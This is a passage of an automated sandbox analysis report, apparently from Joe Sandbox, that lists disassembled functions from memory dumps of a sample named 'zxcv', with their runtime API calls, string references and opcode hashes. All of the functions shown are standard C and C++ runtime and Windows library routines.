Opcode ID: bdac0b3bbf9c1cec62767a91da25cc8513b0abef03ac09261e2cf69306e6714b
Instruction ID: 480fe6dfd665b3e7841fe82e6e86a4bebe0b167281488dd29928cde589a06672
Opcode Fuzzy Hash: bdac0b3bbf9c1cec62767a91da25cc8513b0abef03ac09261e2cf69306e6714b
Instruction Fuzzy Hash: 29F0D632920126ABDF2C5E74CC06ABA7B64EB50756F064428EC01B31C0DAB4EF55C694

Function 0025DB2A Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00253E60: GetLastError.KERNEL32(?,00000008,0025A6B1,00000000,0024B2C0), ref: 00253E64
Part of subcall function 00253E60: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 00253F06

EnumSystemLocalesW.KERNEL32(0025DE08,00000001,?,?,-00000050,?,0025E1AA,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0025DB74

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 683ede30011705d6be5616e59ee3ee0895569a5cd2284b341fe668b7ad9c6c8c
Instruction ID: a5184f1e22ec0c08f180b21ef85ed77372686824f4c9d4f251c82651a62f02a1
Opcode Fuzzy Hash: 683ede30011705d6be5616e59ee3ee0895569a5cd2284b341fe668b7ad9c6c8c
Instruction Fuzzy Hash: C8F046362103045FCB24AF38DC81A7A7B92EF8137DF06402CFD054B680C6B1AC15CB44

Function 0025515D Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0024F500: EnterCriticalSection.KERNEL32(?,?,00253B38,?,0026D6D0,00000008,00253CFC,?,?,?), ref: 0024F50F

EnumSystemLocalesW.KERNEL32(00255150,00000001,0026D770,0000000C,00255522,00000000), ref: 00255195

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 38d0d91e0cc55d5ebdd3a6be8a0e248b531bfbab033de92b7f357e1ac9d04da6
Instruction ID: 8dd3ad66333f40a3e6286ddacebd1ff9b435616f232d600a9bc103e3d1b69f60
Opcode Fuzzy Hash: 38d0d91e0cc55d5ebdd3a6be8a0e248b531bfbab033de92b7f357e1ac9d04da6
Instruction Fuzzy Hash: 20F0A936A20210DFD701EF98E882B9C7BB0EB45321F10802AF810DB2A0CBB55954CF80

Function 0025DA44 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00253E60: GetLastError.KERNEL32(?,00000008,0025A6B1,00000000,0024B2C0), ref: 00253E64
Part of subcall function 00253E60: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 00253F06

EnumSystemLocalesW.KERNEL32(0025D99D,00000001,?,?,?,0025E208,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0025DA7B

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 7909feeed79e970a63d10f15c33809ea08b3e1114c881206ee2e43b2195d6fda
Instruction ID: 9793eb29d7200b2579418434722899e924ff695000f215adaf2fb69728155ce8
Opcode Fuzzy Hash: 7909feeed79e970a63d10f15c33809ea08b3e1114c881206ee2e43b2195d6fda
Instruction Fuzzy Hash: F4F0E53630020557CB14AF39D84966B7F94EFC2762B064058EE098B291C6719D5BC794

Function 00247558 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00007564,0024692E), ref: 0024755D

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8474ea5a0115e035f8d434de67bd84c7972f5001a1d28e2e3d2123b658edbdaa
Instruction ID: bb49a07860fdf8e099028e70e59b379d3da227aba308e126a661632e03a211da
Opcode Fuzzy Hash: 8474ea5a0115e035f8d434de67bd84c7972f5001a1d28e2e3d2123b658edbdaa
Instruction Fuzzy Hash:

Function 00244EFA Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3aef790163fe513117806f347c9884ca8a41e1e079b63a90b71e82bb48eb27b8
Instruction ID: d1ffa710ed1081a864eba3ac0a40acf80252f520e6365b41725748f3cca49972
Opcode Fuzzy Hash: 3aef790163fe513117806f347c9884ca8a41e1e079b63a90b71e82bb48eb27b8
Instruction Fuzzy Hash: 98E022B0669300A7E708AB54ED06B8776D99BC5300F40803CB2489B3C6DBF4A958E7E2

Function 00272F38 Relevance: 15.2, APIs: 10, Instructions: 191COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00272F64
std::_Lockit::_Lockit.LIBCPMT ref: 00272F81
std::_Lockit::~_Lockit.LIBCPMT ref: 00272FA5
std::_Lockit::~_Lockit.LIBCPMT ref: 00272FD0
std::_Lockit::_Lockit.LIBCPMT ref: 00273042
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00273097
__Getctype.LIBCPMT ref: 002730AE
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 002730EE
std::_Lockit::~_Lockit.LIBCPMT ref: 00273190
std::_Facet_Register.LIBCPMT ref: 00273196

Memory Dump Source

Source File: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_GetctypeLocinfo_ctorLocinfo_dtorRegister
String ID:
API String ID: 103145292-0
Opcode ID: ca4254af08de57e511f15fa8e5308276a495e774c0d225cd776f4c1db867a757
Instruction ID: 7c6e877891ee8d6905a085c38ed1b15f5c710949b3cb4b46b3c34f8de39541f1
Opcode Fuzzy Hash: ca4254af08de57e511f15fa8e5308276a495e774c0d225cd776f4c1db867a757
Instruction Fuzzy Hash: 896180B19243818BD720DF24C841B5BB7E4AF94304F44882DF88D97252EB75EA58CF93

Function 0024A058 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 0024A177
___TypeMatch.LIBVCRUNTIME ref: 0024A285
CallUnexpected.LIBVCRUNTIME ref: 0024A3F2

Strings

csm, xrefs: 0024A1AE
csm, xrefs: 0024A102
csm, xrefs: 0024A095
8S&, xrefs: 0024A16E

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: CallMatchTypeUnexpectedtype_info::operator==
String ID: 8S&$csm$csm$csm
API String ID: 1206542248-3855715068
Opcode ID: 79f1f417d12be7835ee10019ada17bada0411a543ffde6ce49dbea4b2485d908
Instruction ID: 6d0a24708c47b727846217bffe8daa70cb1439f600889cc0dcd95f6a2c772cd1
Opcode Fuzzy Hash: 79f1f417d12be7835ee10019ada17bada0411a543ffde6ce49dbea4b2485d908
Instruction Fuzzy Hash: 1EB16C7186020ADFCF2DDFA4C9819AEBBB5FF14310F14419AE8156B212D771DA61CF92

Function 00278DB0 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00278ECF
___TypeMatch.LIBVCRUNTIME ref: 00278FDD
_UnwindNestedFrames.LIBCMT ref: 0027912F
CallUnexpected.LIBVCRUNTIME ref: 0027914A

Strings

csm, xrefs: 00278DED
csm, xrefs: 00278E5A
csm, xrefs: 00278F06

Memory Dump Source

Source File: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: bca48ede98bc9644994582ff637e3a37132db79052d9ea52617ab948eb45153a
Instruction ID: b9a275e22e50f2529a8cdb280024c34e3d290352768054e1cbec09ff110c1d7d
Opcode Fuzzy Hash: bca48ede98bc9644994582ff637e3a37132db79052d9ea52617ab948eb45153a
Instruction Fuzzy Hash: 00B1693182130AEFCF28DFA4C8859AEB7B5BF14310F54815AE8186B212D771DAB1CF91

Function 00257AEF Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 00257D68

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 0d8ef99e00df08c595daeb2ece51b3dd187b300bc36f6edc3c410f0648b6c57d
Instruction ID: fa9548af6324a019f03f01b8a98f3ccddf891af8083581f2a1c6f6872b3d5b89
Opcode Fuzzy Hash: 0d8ef99e00df08c595daeb2ece51b3dd187b300bc36f6edc3c410f0648b6c57d
Instruction Fuzzy Hash: 14B16A70A68246AFDB15CFA9E841BBDBBB5BF45301F148094EC009B391CBB09D69CF64

Function 0029273B Relevance: 10.7, APIs: 7, Instructions: 248COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 0029289C
__alloca_probe_16.LIBCMT ref: 0029292B
__freea.LIBCMT ref: 00292976
__freea.LIBCMT ref: 0029297C
__freea.LIBCMT ref: 002929B2
__freea.LIBCMT ref: 002929B8
__freea.LIBCMT ref: 002929C8

Memory Dump Source

Source File: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: __freea$__alloca_probe_16
String ID:
API String ID: 3509577899-0
Opcode ID: d65969255e2f0c461659b9d57a5f11815becc59866f944b31111e55b71392879
Instruction ID: 7a17844534f1bd201915545cf01dfc42712e25b8f575203db429c1d7a655068d
Opcode Fuzzy Hash: d65969255e2f0c461659b9d57a5f11815becc59866f944b31111e55b71392879
Instruction Fuzzy Hash: 0471DC31D20216FFEF219F948C41FEEB7BAAF49310F290059E814A7281D7759D698BB0

Function 00255326 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,914AA853,?,00255433,?,?,00000000,00000000), ref: 002553E7

Strings

api-ms-, xrefs: 0025537D
ext-ms-, xrefs: 00255391

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: fac559ba5a05d8e04ac9b39104070583a2682911441f2f534f4c6264843d8ddd
Instruction ID: 9ccda4aa984dd7b950ba7064f9d87efa1c415bd11cafd2db8db35ce4611e3790
Opcode Fuzzy Hash: fac559ba5a05d8e04ac9b39104070583a2682911441f2f534f4c6264843d8ddd
Instruction Fuzzy Hash: 0B210D31A21A31BBCB22AF60EC54A5A37AC9F427F1F254550FD4AAB290D7F0ED14C6D4

Function 00273E41 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00273E48
std::_Lockit::_Lockit.LIBCPMT ref: 00273E52

Part of subcall function 0026FD98: std::_Lockit::_Lockit.LIBCPMT ref: 0026FDB4
Part of subcall function 0026FD98: std::_Lockit::~_Lockit.LIBCPMT ref: 0026FDD1

codecvt.LIBCPMT ref: 00273E8C
std::_Facet_Register.LIBCPMT ref: 00273EA3
std::_Lockit::~_Lockit.LIBCPMT ref: 00273EC3

Strings

dOC, xrefs: 00273E5D

Memory Dump Source

Source File: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID: dOC
API String ID: 712880209-682359054
Opcode ID: 08d409ab8f65cfa251cbcb9404e233e286c333acaa76841f7ef905a91d8db047
Instruction ID: 893db6f34c2d0f6bde7aec3245e3a807b21947383397219282805cff4ea6b234
Opcode Fuzzy Hash: 08d409ab8f65cfa251cbcb9404e233e286c333acaa76841f7ef905a91d8db047
Instruction Fuzzy Hash: FA01D23192062A9BCF05FFA0D841ABEB771AF84310F248419F818A72D2CF749E219F85

Function 00245DA3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00245DAA
std::_Lockit::_Lockit.LIBCPMT ref: 00245DB5
std::_Lockit::~_Lockit.LIBCPMT ref: 00245E23

Part of subcall function 00245F06: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00245F1E

std::locale::_Setgloballocale.LIBCPMT ref: 00245DD0
_Yarn.LIBCPMT ref: 00245DE6

Strings

u:$, xrefs: 00245DF2, 00245E16

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID: u:$
API String ID: 1088826258-3033614593
Opcode ID: 86849b9c3ff39c771f177f0f2746aa4d1e1993ef7af6e6e729891df31cd2b37f
Instruction ID: da19736500a674c87aaa27210fc178ad434aa6f020d0bfb69e26a6746effff6f
Opcode Fuzzy Hash: 86849b9c3ff39c771f177f0f2746aa4d1e1993ef7af6e6e729891df31cd2b37f
Instruction Fuzzy Hash: 8801DF756209318BC70AEF21E89563C7B65FF86740F154049E8425B382DF34AE62CFC2

Function 00251545 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,914AA853,?,?,00000000,002639F8,000000FF,?,002514D5,?,?,002514A9,00000000), ref: 0025157A
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0025158C
FreeLibrary.KERNEL32(00000000,?,00000000,002639F8,000000FF,?,002514D5,?,?,002514A9,00000000), ref: 002515AE

Strings

u:$, xrefs: 0025159D
CorExitProcess, xrefs: 00251584
mscoree.dll, xrefs: 00251573

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll$u:$
API String ID: 4061214504-3365302051
Opcode ID: f45af1a9d0ecc05e61ec71942aed7bf01293aaa33aee9516c3d8cfeab8aa3640
Instruction ID: 4147fca320e0de52f4cea0af48634dbb8fd6251ce398cf3e717eb4e8178d4c53
Opcode Fuzzy Hash: f45af1a9d0ecc05e61ec71942aed7bf01293aaa33aee9516c3d8cfeab8aa3640
Instruction Fuzzy Hash: 22012631964225EFDB129F40EC0DFAEBBB8FB05B15F004225FC12A22D0EBB49914CA40

Function 0024659B Relevance: 9.2, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 002465E4
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0024664F
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0024666C
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 002466AB
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0024670A
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0024672D

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: ce2a88b86d9fc52a0b2c55654e195d9da90fba1e0f1afbf91a00c613950ff544
Instruction ID: c0c26b9e96ce6254fb4bd6f97a4359c461291498f3c605de30b8ec8d6be3a7bf
Opcode Fuzzy Hash: ce2a88b86d9fc52a0b2c55654e195d9da90fba1e0f1afbf91a00c613950ff544
Instruction Fuzzy Hash: 2951D372920216AFEF289F54DC4CFABBBA9EF46744F154029F900E6150D774CC20CB91

Function 00249CEA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00249CE1,0024840A,002475A8), ref: 00249CF8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00249D06
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00249D1F
SetLastError.KERNEL32(00000000,00249CE1,0024840A,002475A8), ref: 00249D71

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e9d00a773a4dabbe7956eb1cff9cf0926d9308483ad22071b0bc82e83621d4ee
Instruction ID: 7f0e805b953c175bd21b109fc3d020abec747dbfbc24e3c65e15d1210c9e4d98
Opcode Fuzzy Hash: e9d00a773a4dabbe7956eb1cff9cf0926d9308483ad22071b0bc82e83621d4ee
Instruction Fuzzy Hash: D401283653F7129DA72E3BB5BC8552B3B48EB03734B30122AF110491E0EF525CA1D540

Function 00249E01 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00249EC8
___AdjustPointer.LIBCMT ref: 00249EEB
___AdjustPointer.LIBCMT ref: 00249F87

Strings

u:$, xrefs: 00249E60

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

